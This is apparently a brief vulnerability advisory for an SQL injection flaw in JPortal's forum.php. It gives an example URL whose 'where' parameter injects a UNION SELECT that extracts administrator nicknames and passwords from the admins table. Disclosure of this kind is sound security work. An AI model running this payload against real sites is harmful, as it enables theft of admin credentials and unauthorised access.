JPortal Forum Forum.PHP SQL Injection Vulnerability

JPortal Forum Forum.PHP SQL Injection Vulnerability

No exploit is required.

An example URI has been provided:

http://www.example.com/jportal/forum.php?cmd=search&word=Trey&where=author%20and%201=0%20union%20select%20null,null,nick,pass,null,
null,null,null,null,null,null,null,null,null,null,null%20from%20admins%20/*